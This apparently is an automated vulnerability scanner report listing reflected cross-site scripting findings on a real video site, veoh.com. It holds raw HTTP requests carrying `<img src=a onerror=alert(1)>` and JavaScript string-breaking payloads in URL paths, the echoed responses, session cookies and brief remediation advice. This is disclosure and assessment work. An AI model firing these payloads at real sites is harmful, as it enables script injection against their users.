GET /browse/videos/category/action_adventure/watch/v2075425966g5b8E8134b4'%3b0705df69313 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:14 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=51 Content-Length: 94049
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9241d<img%20src%3da%20onerror%3dalert(1)>74c4f0281bf was submitted in the REST URL parameter 4. This input was echoed as 9241d<img src=a onerror=alert(1)>74c4f0281bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure9241d<img%20src%3da%20onerror%3dalert(1)>74c4f0281bf/watch/v20754927ZpAfSEzt HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:48 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=63 Content-Length: 76199
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure9241d<img src=a onerror=alert(1)>74c4f0281bf"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cf07"><img%20src%3da%20onerror%3dalert(1)>5bb73bd76de was submitted in the REST URL parameter 4. This input was echoed as 6cf07"><img src=a onerror=alert(1)>5bb73bd76de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure6cf07"><img%20src%3da%20onerror%3dalert(1)>5bb73bd76de/watch/v20754927ZpAfSEzt HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:12 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=62 Content-Length: 76243
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure6cf07"><img src=a onerror=alert(1)>5bb73bd76de/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f615e'%3b41e7360e1ba was submitted in the REST URL parameter 6. This input was echoed as f615e';41e7360e1ba in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v20754927ZpAfSEztf615e'%3b41e7360e1ba HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:59 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=64 Content-Length: 94049
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c9a6b<img%20src%3da%20onerror%3dalert(1)>0a8a5dfab55 was submitted in the REST URL parameter 4. This input was echoed as c9a6b<img src=a onerror=alert(1)>0a8a5dfab55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventurec9a6b<img%20src%3da%20onerror%3dalert(1)>0a8a5dfab55/watch/v20756872Ta2Y7sDB HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:37 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=19 Content-Length: 76652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventurec9a6b<img src=a onerror=alert(1)>0a8a5dfab55"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29b15"><img%20src%3da%20onerror%3dalert(1)>23623364388 was submitted in the REST URL parameter 4. This input was echoed as 29b15"><img src=a onerror=alert(1)>23623364388 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure29b15"><img%20src%3da%20onerror%3dalert(1)>23623364388/watch/v20756872Ta2Y7sDB HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:37:30 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=73 Content-Length: 76696
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure29b15"><img src=a onerror=alert(1)>23623364388/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80777'%3b1ead9050767 was submitted in the REST URL parameter 6. This input was echoed as 80777';1ead9050767 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB80777'%3b1ead9050767 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:48 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=90 Content-Length: 94049
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55707"><img%20src%3da%20onerror%3dalert(1)>2b623c86a4a was submitted in the REST URL parameter 4. This input was echoed as 55707"><img src=a onerror=alert(1)>2b623c86a4a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure55707"><img%20src%3da%20onerror%3dalert(1)>2b623c86a4a/watch/v20757961gnh48zmS HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:37:23 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=100 Content-Length: 76349
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure55707"><img src=a onerror=alert(1)>2b623c86a4a/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a9c05<img%20src%3da%20onerror%3dalert(1)>ebb993b4b67 was submitted in the REST URL parameter 4. This input was echoed as a9c05<img src=a onerror=alert(1)>ebb993b4b67 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventurea9c05<img%20src%3da%20onerror%3dalert(1)>ebb993b4b67/watch/v20757961gnh48zmS HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:37 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=78 Content-Length: 76305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventurea9c05<img src=a onerror=alert(1)>ebb993b4b67"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1adb'%3b90455422d30 was submitted in the REST URL parameter 6. This input was echoed as a1adb';90455422d30 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v20757961gnh48zmSa1adb'%3b90455422d30 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:47 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=42 Content-Length: 94049
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1f894<img%20src%3da%20onerror%3dalert(1)>9de463e3ec9 was submitted in the REST URL parameter 4. This input was echoed as 1f894<img src=a onerror=alert(1)>9de463e3ec9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure1f894<img%20src%3da%20onerror%3dalert(1)>9de463e3ec9/watch/v20758438BTte3QQz HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:42 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=70 Content-Length: 74555
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure1f894<img src=a onerror=alert(1)>9de463e3ec9"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81165"><img%20src%3da%20onerror%3dalert(1)>17f00c2e735 was submitted in the REST URL parameter 4. This input was echoed as 81165"><img src=a onerror=alert(1)>17f00c2e735 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure81165"><img%20src%3da%20onerror%3dalert(1)>17f00c2e735/watch/v20758438BTte3QQz HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:37:36 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=68 Content-Length: 74599
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure81165"><img src=a onerror=alert(1)>17f00c2e735/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d86c9'%3b11294ec602e was submitted in the REST URL parameter 6. This input was echoed as d86c9';11294ec602e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v20758438BTte3QQzd86c9'%3b11294ec602e HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:52 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=60 Content-Length: 94049
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 218d8'%3b167cb8b726a was submitted in the REST URL parameter 6. This input was echoed as 218d8';167cb8b726a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
